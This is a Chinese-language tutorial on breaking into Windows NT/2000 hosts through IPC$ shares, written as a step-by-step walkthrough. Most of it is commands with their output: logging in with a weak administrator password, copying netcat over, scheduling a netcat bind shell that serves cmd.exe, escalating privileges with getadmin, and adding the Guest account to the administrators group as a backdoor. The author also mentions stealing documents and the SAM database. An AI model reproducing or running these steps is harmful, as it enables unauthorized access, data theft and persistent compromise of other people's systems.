IPC入侵攻略！其實針對IPC漏洞入侵的方法目前已經(jīng)有很多的教程，但是其中很多教程并不完整，所以還是有很多網(wǎng)友來信問我關(guān)于IPC漏洞入侵的有關(guān)問題，這就是我寫這篇文章的原因了。如果你覺得本文也不完整，那只好去找更好的版本了，但是我希望你能把你的意見和建議告訴我，讓我不斷的完善這篇文章。本文參考了小榕的流光2000說明文檔及其它相關(guān)文檔，也包含了一些自己的心得體會。本文歡迎非商業(yè)性轉(zhuǎn)載，但請保持文章完整性并注明出處�。�-）

IPC是Internet Process Connection的縮寫，也就是遠(yuǎn)程網(wǎng)絡(luò)連接。它是Windows NT及Windows 2000特有的一項功能，特點是在同一時間內(nèi)，兩個IP之間只允許建立一個連接。好了，廢話少說，現(xiàn)在進入主題。

如何找到具有IPC漏洞的主機呢？以前我都是組合一個國外的掃描工具（名字我忘了）和KillUSA的LetMeIn，因為很多工作都是手工完成的，所以速度可想而知了�，F(xiàn)在因為有了小榕的流光2000，所以找到這樣的主機實在是太簡單了，具體操作我就不說了，大家可以參考該軟件的說明文檔。

好了，假設(shè)我們已經(jīng)找到了一臺這樣的主機，地址是139.223.200.xxx，管理員帳號是Administrator，密碼是123456。進入命令行方式，正式開工。需要說明的是，以下操作都是在目標(biāo)主機沒有禁止遠(yuǎn)程IPC$連接和啟動Schedule服務(wù)的理想情況下進行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。

F:\》copy nc.exe \\139.223.200.xxx\admin$
已復(fù)制 1 個文件。

F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的當(dāng)前時間是 2010/06/25 上午 10:25
在 \\139.223.200.xxx 的本地時間 (GMT - 07:00) 是 2010/06/25 上午10:35
命令成功完成。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一項作業(yè)，其作業(yè) ID = 0

F:\》telnet 139.223.200.xxx 1234

上面的命令很簡單，你只要參考一下net，at和nc的用法就可以了。這樣，我們就登上了遠(yuǎn)程的主機。最理想的情況是這樣的，但是，也許你會遇到目標(biāo)主機的Schedule服務(wù)沒有啟動的情況，那么，at命令就不能用了，我們就需要增加以下步驟。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服務(wù)仍未啟動。

F:\》netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

登上遠(yuǎn)程主機之后，我們可以做什么呢？這要視這個帳號的權(quán)限以及該主機的安全策略來決定。如果你的權(quán)限不夠的話，可以試試下面的步驟。首先在本地執(zhí)行下面的命令。

F:\》copy getadmin.exe \\139.223.200.xxx\admin$
已復(fù)制 1 個文件。

F:\》copy gasys.dll \\139.223.200.xxx\admin$
已復(fù)制 1 個文件。

其次，在遠(yuǎn)程主機運行下面的命令。

C:\WINNT\system32》getadmin

如果成功的話，你就是這臺主機的管理員了，權(quán)限夠大了吧？：-）

那么，現(xiàn)在我們能做什么呢？改主頁？下載SAM數(shù)據(jù)庫？都可以啦！方法有很多，我就不一一說了，具體方法可以參考相關(guān)教程。我一般對目標(biāo)主機上的WORD文檔和數(shù)據(jù)庫比較感興趣，呵呵。。。

其實，如果你在這臺機子上面放個木馬或者病毒什么的東東，做起事來更容易一些，但是我覺得如果你跟他沒什么深仇大恨的話，還是不要這么做了，這樣不好。

作完了你要做的事，不要忘了做個后門。

C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.

C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.

這是個比較簡單的后門，要想做的更好一些，可以象Linux那樣，做出一套RootKits來，其實這樣的東東目前已經(jīng)有了，你只要拿來用就可以了。現(xiàn)在搞破壞真是簡單多了，那么多的傻瓜工具任你用，哎！要想自保，不學(xué)點安全知識怎么行呢？